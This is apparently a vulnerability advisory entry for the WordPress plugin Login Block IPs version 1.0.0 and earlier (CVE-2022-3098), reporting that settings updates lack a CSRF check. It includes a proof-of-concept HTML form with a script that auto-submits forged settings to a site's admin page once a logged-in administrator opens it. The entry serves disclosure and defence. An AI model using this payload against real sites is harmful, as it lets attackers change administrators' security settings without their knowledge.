Lucene search
Daniel RufWPEX-ID:F4FCF41B-C05D-4236-8E67-A52D0F94C80AHistorySep 05, 2022 - 12:00 a.m.
Login Block IPs <= 1.0.0 - Arbitrary Setting Update via CSRF
2022-09-0500:00:00
Daniel Ruf
250
0.001 Low
EPSS
Percentile
26.0%
The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack
Make a logged in admin open a page containing the HTML code below
<form id="test" action="https://example.com/wp-admin/admin.php?page=login-block-ips%2Fadmin%2Fpartials%2Flogin-block-ips-admin-display.php" method="POST">
<input type="text" name="login-block-ips-form" value="1">
<input type="text" name="security_code" value="fff">
<input type="text" name="ip1" value="4.4.4.4">
<input type="text" name="ipdesc1" value="test4">
<input type="text" name="ip2" value="">
<input type="text" name="ipdesc2" value="">
<input type="text" name="ip3" value="">
<input type="text" name="ipdesc3" value="">
<input type="text" name="ip4" value="">
<input type="text" name="ipdesc4" value="">
<input type="text" name="ip5" value="">
<input type="text" name="ipdesc5" value="">
<input type="text" name="ip6" value="">
<input type="text" name="ipdesc6" value="">
<input type="text" name="ip7" value="">
<input type="text" name="ipdesc7" value="">
<input type="text" name="ip8" value="">
<input type="text" name="ipdesc8" value="">
<input type="text" name="ip9" value="">
<input type="text" name="ipdesc9" value="">
<input type="text" name="ip10" value="">
<input type="text" name="ipdesc10" value="">
<input type="text" name="ip11" value="">
<input type="text" name="ipdesc11" value="">
<input type="text" name="ip12" value="">
<input type="text" name="ipdesc12" value="">
<input type="text" name="ip13" value="">
<input type="text" name="ipdesc13" value="">
<input type="text" name="ip14" value="">
<input type="text" name="ipdesc14" value="">
</form>
<script>
document.getElementById("test").submit();
</script>Related
patchstack
patchstack
nvd
nvd
CVE-2022-3098
2022-09-26 13:15:11
cve
cve
CVE-2022-3098
2022-09-26 13:15:11
cvelist
cvelist
CVE-2022-3098 Login Block IPs <= 1.0.0 - Arbitrary Setting Update via CSRF
2022-09-26 12:35:43
wpvulndb
wpvulndb
Login Block IPs <= 1.0.0 - Arbitrary Setting Update via CSRF
2022-09-05 00:00:00
cnvd
cnvd
WordPress Login Block IPs cross-site request forgery vulnerability
2022-09-28 00:00:00
prion
prion
Cross site request forgery (csrf)
2022-09-26 13:15:00